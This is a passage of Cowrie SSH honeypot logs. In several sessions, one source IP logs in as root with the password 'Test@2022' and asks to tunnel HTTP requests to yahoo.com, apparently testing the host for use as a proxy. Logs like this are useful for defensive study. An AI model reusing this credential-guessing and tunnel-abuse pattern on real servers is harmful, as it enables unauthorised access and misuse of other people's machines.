-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.698723Z","src_ip":"213.209.150.239","session":"a0e9caa68b5a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:55.981546Z","src_ip":"213.209.150.239","session":"a0e9caa68b5a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15826,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15826","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.041146Z","session":"a0e9caa68b5a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.098176Z","src_ip":"213.209.150.239","session":"a0e9caa68b5a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5631,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5631","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.255100Z","session":"a0e9caa68b5a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.312056Z","src_ip":"213.209.150.239","session":"a0e9caa68b5a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.369671Z","src_ip":"213.209.150.239","session":"a0e9caa68b5a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16118,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5022510c70c","protocol":"ssh","message":"New connection: 213.209.150.239:16118 (1.2.3.4:22) [session: a5022510c70c]","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.415299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.416249Z","src_ip":"213.209.150.239","session":"a5022510c70c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.464111Z","src_ip":"213.209.150.239","session":"a5022510c70c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.698813Z","src_ip":"213.209.150.239","session":"a5022510c70c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":10601,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10601","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.746969Z","session":"a5022510c70c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.794530Z","src_ip":"213.209.150.239","session":"a5022510c70c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":21792,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21792","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.929583Z","session":"a5022510c70c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:56.976828Z","src_ip":"213.209.150.239","session":"a5022510c70c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.024801Z","src_ip":"213.209.150.239","session":"a5022510c70c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16158,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c42be1c7265","protocol":"ssh","message":"New connection: 213.209.150.239:16158 (1.2.3.4:22) [session: 0c42be1c7265]","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.080206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.081525Z","src_ip":"213.209.150.239","session":"0c42be1c7265"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.138685Z","src_ip":"213.209.150.239","session":"0c42be1c7265"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.421973Z","src_ip":"213.209.150.239","session":"0c42be1c7265"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":7137,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:7137","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.479948Z","session":"0c42be1c7265"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.537065Z","src_ip":"213.209.150.239","session":"0c42be1c7265"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":23859,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:23859","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.691003Z","session":"0c42be1c7265"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.747550Z","src_ip":"213.209.150.239","session":"0c42be1c7265"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.805449Z","src_ip":"213.209.150.239","session":"0c42be1c7265"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16219,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9a678f346b1","protocol":"ssh","message":"New connection: 213.209.150.239:16219 (1.2.3.4:22) [session: a9a678f346b1]","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.851725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.852514Z","src_ip":"213.209.150.239","session":"a9a678f346b1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:57.900013Z","src_ip":"213.209.150.239","session":"a9a678f346b1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.135186Z","src_ip":"213.209.150.239","session":"a9a678f346b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":4667,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4667","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.183477Z","session":"a9a678f346b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.231199Z","src_ip":"213.209.150.239","session":"a9a678f346b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":9826,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:9826","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.369583Z","session":"a9a678f346b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.417067Z","src_ip":"213.209.150.239","session":"a9a678f346b1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.465358Z","src_ip":"213.209.150.239","session":"a9a678f346b1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16263,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3e4be831e2","protocol":"ssh","message":"New connection: 213.209.150.239:16263 (1.2.3.4:22) [session: 7e3e4be831e2]","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.511611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.512611Z","src_ip":"213.209.150.239","session":"7e3e4be831e2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.559573Z","src_ip":"213.209.150.239","session":"7e3e4be831e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.794859Z","src_ip":"213.209.150.239","session":"7e3e4be831e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29188,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29188","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.843349Z","session":"7e3e4be831e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:58.890719Z","src_ip":"213.209.150.239","session":"7e3e4be831e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":20418,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20418","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.025592Z","session":"7e3e4be831e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.072852Z","src_ip":"213.209.150.239","session":"7e3e4be831e2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.120853Z","src_ip":"213.209.150.239","session":"7e3e4be831e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16309,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9fe9edb447d","protocol":"ssh","message":"New connection: 213.209.150.239:16309 (1.2.3.4:22) [session: c9fe9edb447d]","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.176594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.177444Z","src_ip":"213.209.150.239","session":"c9fe9edb447d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.233907Z","src_ip":"213.209.150.239","session":"c9fe9edb447d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.516441Z","src_ip":"213.209.150.239","session":"c9fe9edb447d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18730,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18730","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.574243Z","session":"c9fe9edb447d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:59.631216Z","src_ip":"213.209.150.239","session":"c9fe9edb447d"}
